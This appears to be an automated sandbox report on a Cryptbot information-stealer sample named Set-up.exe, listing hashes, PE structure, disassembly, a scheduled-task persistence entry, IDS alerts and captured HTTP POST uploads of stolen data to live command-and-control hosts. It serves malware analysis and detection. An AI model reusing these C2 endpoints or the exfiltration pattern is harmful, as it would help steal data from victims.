Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Set-up.exe, PID 7444 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Set-up.exe

Simulations

Behavior and APIs

Time	Type	Description
08:44:23	API Interceptor	3x Sleep call for process: Set-up.exe modified
08:45:49	API Interceptor	485x Sleep call for process: service123.exe modified
14:45:16	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.244.181.140	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	sixvv16pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvx13pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	forvc14pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fiftvx15pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	sevtvx17pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	tventyvr20pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	sixvv16pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	forvc14pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvx13pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	elevenvx11ht.top/v1/upload.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sevtvx17pt.top	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BELCLOUDBG	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140

Process:	C:\Users\user\Desktop\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.054347345617942
Encrypted:	false
SSDEEP:	24576:nJW4LBm/PaLHur52La3AldScWbJmM2Wbnhs3PNwXNzue:62W9wWbnePeXx3
MD5:	2992D44630AC7A7C663F17A506C325F1
SHA1:	B065E87A4AE2F221D0F00FC4809AF164A459C126
SHA-256:	1054A40DF7549FFB709FAB7476E9E622DF0BB9666DEC27B93795BBF74D809322
SHA-512:	4E72F207FC69D2C4CC6E73DFB56EA06EFC7691D3567D19F196095B80591C61F65AF5D04CD4A506D3944E30D61B83C46E9856CAC40853FFAFACDB6A7573E99836
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........#...(...........................a.........................@......!z....@... .........................`.......................................@z...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..@z.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\Desktop\Set-up.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.0023405214781110325
Encrypted:	false
SSDEEP:
MD5:	D3D8BD210D50D5EB78D8C43E70738DD1
SHA1:	48353C89D27BCD6298B0EDF5129EB8E7C819A3C0
SHA-256:	BA8709E40C4995B19667C7EB928775C4CA675D1008D119DF0164E3750A9813CA
SHA-512:	0CA7D951FE436A32D2B3F5B5E52B34D45A7471AAA26B48713A21EE5DE07B6DB49A77F859CADF7A8696557ACF0EB81906D195CA7ECDED6099371408635C6EFDDC
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...............(.v........................@.......................... ............@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	2.782204586747232
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	9'988'096 bytes
MD5:	78b5c3b4fb31188ee6c024ff96ff3807
SHA1:	ec49de9a8dee4ee75a2c2e8b53cc380d6d17d702
SHA256:	10409c447cb02b22dbb4a7cfa17335bffc3ccc1e7975596de8b49f0a4045e1e0
SHA512:	71526ebc9bac205dd7a43ae2db6ad212564d524deaac6a810a73e27bcc7946f90ca951daefd241c3738a2ce3a073ef6a967256f83a8fa75f6480ef431affa524
SSDEEP:	24576:z+b5B+/idS9HccEr97tVo04trbsF5cjMUYv/KdKvspAh4/QGNYJ1tfenULGWGlU/:dqejMUYYK6GEHTtxA7
TLSH:	3CA6C462DD87A2EDE19319F89006B33F1634E70188ADDA78DF44DBD1DB72A7CD4AA011
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f...............(.8,..d...............P,...@.......................................@... ......................P..B..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66FF945C [Fri Oct 4 07:08:12 2024 UTC]
TLS Callbacks:	0x401800, 0x4017b0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	208ad2c8c137e3d4c33022e4bb87e9bb

Entrypoint Preview

Instruction
mov dword ptr [00D44070h], 00000001h
jmp 00007F4400C89E96h
nop
mov dword ptr [00D44070h], 00000000h
jmp 00007F4400C89E86h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007F4400C98596h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00D37000h
call dword ptr [00D4622Ch]
sub esp, 04h
test eax, eax
je 00007F4400C8A255h
mov ebx, eax
mov dword ptr [esp], 00D37000h
call dword ptr [00D4624Ch]
mov edi, dword ptr [00D46234h]
sub esp, 04h
mov dword ptr [00D44028h], eax
mov dword ptr [esp+04h], 00D37013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00D37029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [006C5004h], eax
test esi, esi
je 00007F4400C8A1F3h
mov dword ptr [esp+04h], 00D4402Ch
mov dword ptr [esp], 00D41104h
call esi
mov dword ptr [esp], 00401580h
call 00007F4400C8A143h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x945000	0x42	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x946000	0xa98	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x949000	0x44404	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x93fd84	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x94620c	0x1a8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c37c8	0x2c3800	3c3333d0bd2ef3e61f6ea3ef24b2f32b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2c5000	0x6711c0	0x671200	3d28aa60e7c9a77d5e257afb91cb6046	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x937000	0x9eb4	0xa000	f16bba59a906da39e35ca9e0ca2afaec	False	0.3771728515625	data	4.4266120482571765	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x941000	0x21d8	0x2200	44fa583a55c392a246947631f6ae128b	False	0.32341452205882354	data	4.812785483716965	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x944000	0xb74	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x945000	0x42	0x200	a63f01468e86602fac26b8a589e75551	False	0.123046875	data	0.7196023924362801	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x946000	0xa98	0xc00	f38ff2da2c0a46b3c9bc7bfdc046e724	False	0.380859375	data	4.7379518567367915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x947000	0x30	0x200	947565758601e59a9e2e145caaaaefe2	False	0.064453125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x948000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x949000	0x44404	0x44600	73f6cf03dd6af67ba59554257d084c86	False	0.1680258797989031	data	6.615713368614631	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetStartupInfoA, GetTempPathA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WideCharToMultiByte, lstrlenA
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _errno, _chsize, _exit, _filelengthi64, _fileno, _initterm, _iob, _lock, _onexit, _unlock, abort, atoi, calloc, exit, fclose, fflush, fgetpos, fopen, fputc, fread, free, freopen, fsetpos, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, malloc, memcmp, memcpy, memmove, memset, mktime, localtime, difftime, _mkdir, perror, puts, realloc, remove, setlocale, signal, strchr, strcmp, strerror, strlen, strncmp, strncpy, strtol, strtoul, tolower, ungetc, vfprintf, time, wcslen, wcstombs, _stat, _write, _utime, _open, _fileno, _close, _chmod
SHELL32.dll	ShellExecuteA

Exports

Name	Ordinal	Address
main	1	0x5afed0

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-04T14:44:24.477087+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.11	49711	185.244.181.140	80	TCP
2024-10-04T14:44:28.114921+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.11	49714	185.244.181.140	80	TCP
2024-10-04T14:44:33.277141+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.11	49717	185.244.181.140	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 14:44:23.785963058 CEST	49711	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:23.790980101 CEST	80	49711	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:23.791073084 CEST	49711	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:23.791336060 CEST	49711	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:23.791347980 CEST	49711	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:23.796184063 CEST	80	49711	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:23.796205044 CEST	80	49711	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:24.476970911 CEST	80	49711	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:24.477004051 CEST	80	49711	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:24.477087021 CEST	49711	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:24.477128983 CEST	49711	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:24.493669987 CEST	80	49711	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.038708925 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.045954943 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.046046972 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.047144890 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.047250032 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.056060076 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.056081057 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.056090117 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.056099892 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.056108952 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.056118965 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.056127071 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.056133986 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.056139946 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.056152105 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.056163073 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.056190014 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.056222916 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.066524982 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.066541910 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.066597939 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.066598892 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.066610098 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.066617012 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.066654921 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.066673040 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.066673994 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.066688061 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.066730022 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.066755056 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.114789963 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.114921093 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.171170950 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.171276093 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.230331898 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.230391026 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.282335997 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.282428980 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.334304094 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.334356070 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.386498928 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.386603117 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:28.438349962 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:28.535628080 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:29.003720999 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:29.003937006 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:29.004035950 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:29.004133940 CEST	49714	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:29.008905888 CEST	80	49714	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.303483963 CEST	49717	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:32.308583975 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.308736086 CEST	49717	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:32.308888912 CEST	49717	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:32.308989048 CEST	49717	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:32.313925028 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.313997984 CEST	49717	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:32.314033031 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.314043045 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.314053059 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.314121962 CEST	49717	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:32.314198017 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.314244986 CEST	49717	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:32.314388990 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.314399958 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.314409018 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.314418077 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.314425945 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.314448118 CEST	49717	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:32.314487934 CEST	49717	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:32.318943977 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.319010019 CEST	49717	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:32.319025040 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.319034100 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.319044113 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.319137096 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.319165945 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:32.362333059 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:33.276982069 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:33.277077913 CEST	80	49717	185.244.181.140	192.168.2.11
Oct 4, 2024 14:44:33.277141094 CEST	49717	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:33.277177095 CEST	49717	80	192.168.2.11	185.244.181.140
Oct 4, 2024 14:44:33.281924963 CEST	80	49717	185.244.181.140	192.168.2.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 14:44:23.260049105 CEST	59809	53	192.168.2.11	1.1.1.1
Oct 4, 2024 14:44:23.770438910 CEST	53	59809	1.1.1.1	192.168.2.11
Oct 4, 2024 14:44:42.322170973 CEST	53	55339	162.159.36.2	192.168.2.11
Oct 4, 2024 14:44:42.794810057 CEST	57667	53	192.168.2.11	1.1.1.1
Oct 4, 2024 14:44:42.807580948 CEST	53	57667	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 4, 2024 14:44:23.260049105 CEST	192.168.2.11	1.1.1.1	0x1fa7	Standard query (0)	sevtvx17pt.top	A (IP address)	IN (0x0001)	false
Oct 4, 2024 14:44:42.794810057 CEST	192.168.2.11	1.1.1.1	0xec5f	Standard query (0)	198.187.3.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 4, 2024 14:44:23.770438910 CEST	1.1.1.1	192.168.2.11	0x1fa7	No error (0)	sevtvx17pt.top		185.244.181.140	A (IP address)	IN (0x0001)	false
Oct 4, 2024 14:44:42.807580948 CEST	1.1.1.1	192.168.2.11	0xec5f	Name error (3)	198.187.3.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

sevtvx17pt.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49711	185.244.181.140	80	7444	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 14:44:23.791336060 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary49004594 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtvx17pt.top
Oct 4, 2024 14:44:23.791347980 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 39 30 30 34 35 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 59 75 6e Data Ascii: ------Boundary49004594Content-Disposition: form-data; name="file"; filename="Yuneruli.bin"Content-Type: application/octet-streamPp=On#G_X]/TMvcrL/9a&d]hjZ]da]3
Oct 4, 2024 14:44:24.476970911 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Fri, 04 Oct 2024 12:44:24 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49714	185.244.181.140	80	7444	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 14:44:28.047144890 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary80917368 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 90590 Host: sevtvx17pt.top
Oct 4, 2024 14:44:28.047250032 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 30 39 31 37 33 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 69 77 Data Ascii: ------Boundary80917368Content-Disposition: form-data; name="file"; filename="Hiwaga.bin"Content-Type: application/octet-streamQsc\|kUDSUh^<a;qZBLQ?x0uuzN+/RXv6N5\BL~!6;G$:
Oct 4, 2024 14:44:28.056133986 CEST	1236	OUT	Data Raw: 5b 02 18 09 85 6e a5 c6 57 82 ba 12 e7 49 6f 37 99 ab ee b0 5d 5a 2c 86 2c 03 77 0a ae 0c cd 24 a7 be f1 63 47 44 8a 37 e6 ac 0b 5b 00 3f b1 03 53 36 e7 d5 67 e3 2e a0 34 3a 04 30 72 ae 33 24 4b cb 7f ec de aa aa f7 4c 90 76 5e d6 aa b9 9f cf 1b Data Ascii: [nWIo7]Z,,w$cGD7[?S6g.4:0r3$KLv^BZGEU\NS V,YTnrU!tfJQD%gQkyS]Q.k/M,g:Qc\k}-f-spM!KA
Oct 4, 2024 14:44:28.056190014 CEST	12360	OUT	Data Raw: 06 ea d4 92 2c c7 48 31 57 4d e1 d6 e0 d0 4b 7d 3e 4c 5e f8 d4 8a 6a 69 fe 9f 2f 72 50 11 7d bc d5 08 2f 83 cc 41 53 18 5b 45 7b 10 87 f5 c0 36 47 71 a2 64 6d d2 4b 00 4e 7f 11 52 06 56 01 67 d5 d7 76 96 f8 ef 7f 77 58 56 3e 7c 25 ed d2 b1 4b 96 Data Ascii: ,H1WMK}>L^ji/rP}/AS[E{6GqdmKNRVgvwXV>\|%KfsWzO)k{)G<3${?ES)!VbIqA73Jq}V5}`\|):G\5)PYcSI!b.:/qG"`_Qi\|
Oct 4, 2024 14:44:28.056222916 CEST	9888	OUT	Data Raw: ab aa ae 58 3a c8 3a cb c6 0a 57 11 28 28 13 09 2a 00 16 6a 36 d1 a1 4d cd ae 74 ac e3 c8 7d 44 41 6f cb f4 9a 7d 57 d1 f4 04 83 26 fe 9d fe f5 9e 0a 41 0e c1 86 94 8b df f9 40 17 63 c5 67 44 31 0e 65 2b 85 38 f2 82 d1 0e bf 38 b9 1c e4 7a 08 91 Data Ascii: X::W((j6Mt}DAo}W&A@cgD1e+88zp:nO@7Ek8UD1=ngqm$<h){D:^!e@B<WsW`OB;0%iW"1-cMZ_O65kO+72Lh
